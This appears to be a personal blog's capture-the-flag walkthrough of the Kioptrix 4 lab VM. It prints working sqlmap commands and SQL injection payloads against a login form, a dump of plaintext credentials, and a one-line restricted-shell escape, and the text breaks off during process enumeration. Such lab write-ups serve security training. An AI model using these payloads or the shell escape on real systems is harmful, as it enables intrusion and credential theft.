MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Kioptrix 4

| Comments

I know there are a few different methods to the new Kioptrix 4 boot2root. Unfortunately, I could not find the remote root exploit that is mentioned, but my method used several tools, and privilege escalation.

Tools used:

To start out, I had to find the machine on the network. I booted up my Backtrack VM and Kioptrix VM both using a NAT connection in my VMWare. This would put them on the same internal network. In BackTrack, I first found my IP address:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@bt:~# ifconfig
eth1      Link encap:Ethernet  HWaddr 00:0c:29:96:92:1e  
          inet addr:192.168.95.136  Bcast:192.168.95.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe96:921e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:57480 errors:44807 dropped:0 overruns:0 frame:0
          TX packets:193847 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:14079464 (14.0 MB)  TX bytes:14077265 (14.0 MB)
          Interrupt:19 Base address:0x2024 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:136257 errors:0 dropped:0 overruns:0 frame:0
          TX packets:136257 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:26029235 (26.0 MB)  TX bytes:26029235 (26.0 MB)

Using this information, I scanned the subnet for other devices:

1
2
3
4
5
6
7
8
9
10
11
12
root@bt:~# netdiscover -r 192.168.95.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.95.1    00:50:56:c0:00:08    01    060   VMWare, Inc.                 
 192.168.95.2    00:50:56:f1:ea:a0    01    060   VMWare, Inc.                 
 192.168.95.131  00:0c:29:03:da:8f    01    060   VMware, Inc.                 
 192.168.95.254  00:50:56:fb:ac:b6    01    060   VMWare, Inc.  

I figured out of that list, that 1, 2, and 254 were reserved ones, and that 192.168.95.131 would be my Kioptrix VM. So I did a port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@bt:~# nmap -sV 192.168.95.131

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-12 14:03 EST
Nmap scan report for 192.168.95.131
Host is up (0.00011s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:03:DA:8F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.42 seconds

I started to poke around. Since HTTP is often times the easiest for me, I started there. I went to http://192.168.95.131 and was presented with a basic login screen (and a cute goat). I attempted to use the username of “admin”, with the same password, “admin”. It redirected me to a password failure page, located at http://192.168.95.131/checklogin.php. I used the Firefox extension, Tamper Data, to double-check the POST query-string. It showed, “myusername=admin&mypassword=admin&Submit=Login”.

My instincts told me that I should attempt some sql injection on these login screens. I tinkered with some of the basic ones I remembered off the top of my head, but none of them worked. It did show promise though, as I received several errors in the process. This meant it was time for the big guns.

SqlMap is a tool that I’m not super familiar with, but will definitely be learning more about. It’s very powerful, even in the hand of a beginner. I used the url that I posted to, and specified a few options, and just watched it go:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://192.168.95.131/checklogin.php --data="myusername=admin&mypassword=admin&Submit=Login" --level=5 --risk=3 --dbs

    sqlmap/1.0-dev (r4739) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:42:28

[20:42:28] [INFO] using '/pentest/database/sqlmap/output/192.168.95.131/session' as session file
[20:42:28] [INFO] testing connection to the target url
[20:42:28] [INFO] heuristics detected web page charset 'ascii'
[20:42:28] [INFO] testing if the url is stable, wait a few seconds
[20:42:29] [INFO] url is stable
[20:42:29] [INFO] testing if POST parameter 'myusername' is dynamic
[20:42:29] [WARNING] POST parameter 'myusername' appears to be not dynamic
[20:42:29] [WARNING] heuristic test shows that POST parameter 'myusername' might not be injectable
[20:42:29] [INFO] testing sql injection on POST parameter 'myusername'
[20:42:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:42:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:42:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[20:42:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[20:42:31] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[20:42:32] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[20:42:32] [INFO] testing 'MySQL boolean-based blind - WHERE or HAVING clause (RLIKE)'
[20:42:32] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
[20:42:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[20:42:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[20:42:32] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[20:42:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[20:42:32] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
[20:42:32] [INFO] testing 'PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)'
[20:42:32] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)'
[20:42:32] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[20:42:33] [INFO] testing 'Microsoft Access boolean-based blind - Parameter replace (original value)'
[20:42:33] [INFO] testing 'SAP MaxDB boolean-based blind - Parameter replace (original value)'
[20:42:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
[20:42:33] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
[20:42:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[20:42:33] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
[20:42:33] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[20:42:33] [INFO] testing 'Oracle boolean-based blind - GROUP BY and ORDER BY clauses'
[20:42:33] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses'
[20:42:33] [INFO] testing 'MySQL stacked conditional-error blind queries'
[20:42:33] [INFO] testing 'PostgreSQL stacked conditional-error blind queries'
[20:42:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked conditional-error blind queries'
[20:42:34] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:42:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[20:42:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[20:42:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[20:42:35] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:42:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:42:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:42:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:42:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)'
[20:42:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)'
[20:42:35] [INFO] testing 'Firebird AND error-based - WHERE or HAVING clause'
[20:42:36] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[20:42:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[20:42:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[20:42:36] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[20:42:36] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[20:42:36] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[20:42:37] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'
[20:42:37] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'
[20:42:37] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[20:42:37] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (utl_inaddr.get_host_address)'
[20:42:38] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (ctxsys.drithsx.sn)'
[20:42:38] [INFO] testing 'Firebird OR error-based - WHERE or HAVING clause'
[20:42:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:42:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:42:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:42:38] [INFO] testing 'PostgreSQL error-based - Parameter replace'
[20:42:38] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'
[20:42:38] [INFO] testing 'Oracle error-based - Parameter replace'
[20:42:38] [INFO] testing 'Firebird error-based - Parameter replace'
[20:42:38] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
[20:42:38] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
[20:42:38] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
[20:42:38] [INFO] testing 'PostgreSQL error-based - GROUP BY and ORDER BY clauses'
[20:42:38] [INFO] testing 'Microsoft SQL Server/Sybase error-based - ORDER BY clause'
[20:42:38] [INFO] testing 'Oracle error-based - GROUP BY and ORDER BY clauses'
[20:42:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:42:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:42:38] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[20:42:39] [INFO] testing 'PostgreSQL stacked queries (heavy query)'
[20:42:39] [INFO] testing 'PostgreSQL < 8.2 stacked queries (Glibc)'
[20:42:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[20:42:39] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:42:39] [INFO] testing 'Oracle stacked queries (heavy query)'
[20:42:39] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[20:42:39] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[20:42:40] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[20:42:40] [INFO] testing 'Firebird stacked queries (heavy query)'
[20:42:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:42:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[20:42:40] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:42:40] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[20:42:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:42:41] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind (comment)'
[20:42:41] [INFO] testing 'PostgreSQL AND time-based blind (heavy query)'
[20:42:41] [INFO] testing 'PostgreSQL AND time-based blind (heavy query - comment)'
[20:42:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:42:41] [INFO] POST parameter 'myusername' is 'Microsoft SQL Server/Sybase time-based blind' injectable 
[20:42:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[20:42:41] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:42:42] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[20:42:42] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:42:42] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:42:42] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[20:42:42] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 1 to 10 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 1 to 10 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 11 to 20 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 11 to 20 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 21 to 30 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 21 to 30 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 31 to 40 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 31 to 40 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 41 to 50 columns'
[20:42:42] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 41 to 50 columns'
[20:42:43] [INFO] checking if the injection point on POST parameter 'myusername' is a false positive
[20:42:43] [WARNING] false positive injection point detected
[20:42:43] [WARNING] POST parameter 'myusername' is not injectable
[20:42:43] [INFO] testing if POST parameter 'mypassword' is dynamic
[20:42:43] [WARNING] POST parameter 'mypassword' appears to be not dynamic
[20:42:43] [INFO] heuristic test shows that POST parameter 'mypassword' might be injectable (possible DBMS: MySQL)
[20:42:43] [INFO] testing sql injection on POST parameter 'mypassword'
[20:42:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
sqlmap got a 302 redirect to 'http://192.168.95.131:80/login_success.php'. What do you want to do? 
[1] Follow the redirection (default)
[2] Stay on the original page
[3] Ignore
> 2
[20:42:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[20:42:51] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[20:42:51] [INFO] POST parameter 'mypassword' is 'OR boolean-based blind - WHERE or HAVING clause' injectable 
[20:42:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[20:42:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[20:42:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[20:42:51] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[20:42:51] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
[20:42:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[20:42:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
[20:42:51] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
[20:42:51] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[20:42:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:42:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[20:42:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[20:42:51] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:42:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:42:51] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:42:51] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[20:42:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:43:03] [INFO] POST parameter 'mypassword' is 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable 
[20:43:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:43:03] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for UNION query injection technique
[20:43:03] [INFO] target url appears to have 3 columns in query
[20:43:04] [WARNING] if UNION based SQL injection is not detected, please consider usage of option '--union-char' (e.g. --union-char=1) and/or try to force the back-end DBMS (e.g. --dbms=mysql) 
[20:43:04] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (NULL) - 11 to 20 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (random number) - 11 to 20 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (NULL) - 21 to 30 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (random number) - 21 to 30 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (NULL) - 31 to 40 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (random number) - 31 to 40 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (NULL) - 41 to 50 columns'
[20:43:04] [INFO] testing 'MySQL UNION query (random number) - 41 to 50 columns'
[20:43:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:43:04] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[20:43:04] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
[20:43:04] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[20:43:04] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[20:43:04] [INFO] testing 'Generic UNION query (random number) - 21 to 30 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NULL) - 31 to 40 columns'
[20:43:05] [INFO] testing 'Generic UNION query (random number) - 31 to 40 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NULL) - 41 to 50 columns'
[20:43:05] [INFO] testing 'Generic UNION query (random number) - 41 to 50 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 1 to 10 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 1 to 10 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 11 to 20 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 11 to 20 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 21 to 30 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 21 to 30 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 31 to 40 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 31 to 40 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (NULL) - 41 to 50 columns'
[20:43:05] [INFO] testing 'Generic UNION query (NUL comment) (random number) - 41 to 50 columns'
[20:43:05] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others? [Y/n] n
sqlmap identified the following injection points with a total of 3697 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-5618' OR NOT (5039=5039) AND 'Gndx'='Gndx&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=admin' AND 9312=BENCHMARK(5000000,MD5(0x57485477)) AND 'lxSR'='lxSR&Submit=Login
---

[20:43:11] [INFO] testing MySQL
[20:43:11] [INFO] confirming MySQL
[20:43:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.0
[20:43:11] [INFO] fetching database names
[20:43:11] [INFO] fetching number of databases
[20:43:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:43:11] [INFO] retrieved: 3
[20:43:11] [INFO] retrieved: information_schema
[20:43:12] [INFO] retrieved: members
[20:43:13] [INFO] retrieved: mysql
available databases [3]:
[*] information_schema
[*] members
[*] mysql

[20:43:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.95.131'

[*] shutting down at 20:43:13

During this run, you can see that it prompted me only 2 times. Once because it was redirected, and asked if I wanted to stay on the same page or follow the redirect. Another because it found that “mypassword” was injectable, and wanted to know if I wanted to try some others. I didn’t care about any other pages, or any other variables if the first one worked.

This gave me 3 MySQL databases, “information_schema”, “mysql”, and “members”. The first two are default in MySQL installations, but the last probably has to do with the Kioptrix VM. So I decided to go further with the “members” database. I opted to dump all the data in the “members” database.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://192.168.95.131/checklogin.php --data="myusername=admin&mypassword=admin&Submit=Login" --level=5 --risk=3 -D members --dump

    sqlmap/1.0-dev (r4739) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:48:45

[20:48:46] [INFO] using '/pentest/database/sqlmap/output/192.168.95.131/session' as session file
[20:48:46] [INFO] resuming injection data from session file
[20:48:46] [INFO] resuming back-end DBMS 'mysql 5' from session file
[20:48:46] [INFO] testing connection to the target url
[20:48:46] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-5618' OR NOT (5039=5039) AND 'Gndx'='Gndx&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=admin' AND 9312=BENCHMARK(5000000,MD5(0x57485477)) AND 'lxSR'='lxSR&Submit=Login
---

[20:48:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:48:46] [INFO] fetching tables for database: members
[20:48:46] [INFO] fetching number of tables for database 'members'
[20:48:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
sqlmap got a 302 redirect to 'http://192.168.95.131:80/login_success.php'. What do you want to do? 
[1] Follow the redirection (default)
[2] Stay on the original page
[3] Ignore
> 2
1
[20:48:48] [INFO] retrieved: members
[20:48:48] [INFO] fetching columns for table 'members' on database 'members'
[20:48:48] [INFO] retrieved: 3
[20:48:48] [INFO] retrieved: id
[20:48:49] [INFO] retrieved: username
[20:48:49] [INFO] retrieved: password
[20:48:50] [INFO] fetching entries for table 'members' on database 'members'
[20:48:50] [INFO] fetching number of entries for table 'members' on database 'members'
[20:48:50] [INFO] retrieved: 2
[20:48:50] [INFO] retrieved: 1
[20:48:50] [INFO] retrieved: MyNameIsJohn
[20:48:51] [INFO] retrieved: john
[20:48:51] [INFO] retrieved: 2
[20:48:51] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[20:48:52] [INFO] retrieved: robert
[20:48:52] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

[20:48:52] [INFO] Table 'members.members' dumped to CSV file '/pentest/database/sqlmap/output/192.168.95.131/dump/members/members.csv'
[20:48:52] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.95.131'

[*] shutting down at 20:48:52

So there we have some credentials! When I tried these on the login page, both of them worked! However, it was a dead end, as it just showed me the usernames and passwords that I just entered.

On a whim, I tried using the first login to ssh in, and it worked!

1
2
3
4
5
6
7
root@bt:/pentest/database/sqlmap# ssh john@192.168.95.131
john@192.168.95.131's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ 

So I guess that was good news. However the bad news was that it was in a form of a restricted shell. I was not familiar with the “LigGoat Shell”. However, it seemed somewhat limiting. It only allowed the commands of, “cd”, “clear”, “echo”, “exit”, “help”, “ll”, “lpath”, and “ls”. Like most other restricted shells that I’ve ran into in the past, it would not let you pipe things, or access items outside your folder. So if you did a “ls ../”, it would not work. However, unlike other shells, this one would actually disconnect you after a single warning of violating these rules! Luckily, in my searching for methods to break out of a restricted shell, I found a great article on my buddy, g0tmi1k’s site, here.

1
2
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ 

I now had an unrestricted bash shell. I was still limited to the “john” user, which seemed to have normal user privileges. The next step was to escalate to root privileges. I started with looking at what was running.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
john@Kioptrix4:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1696 ?        Ss   Feb11   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   Feb11   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   Feb11   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Feb11   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   Feb11   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   Feb11   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kblockd/0]
root        44  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kacpid]
root        45  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kacpi_notify]
root       180  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kseriod]
root       219  0.0  0.0      0     0 ?        S    Feb11   0:00 [pdflush]
root       220  0.0  0.0      0     0 ?        S    Feb11   0:00 [pdflush]
root       221  0.0  0.0      0     0 ?        S<   Feb11   0:00 [kswapd0]
root       263  0.0  0.0      0     0 ?        S<   Feb11   0:00 [aio/0]
root      1489  0.0  0.0      0     0 ?        S<   Feb11   0:00 [ata/0]
root      1492  0.0  0.0      0     0 ?        S<   Feb11   0:00 [ata_aux]
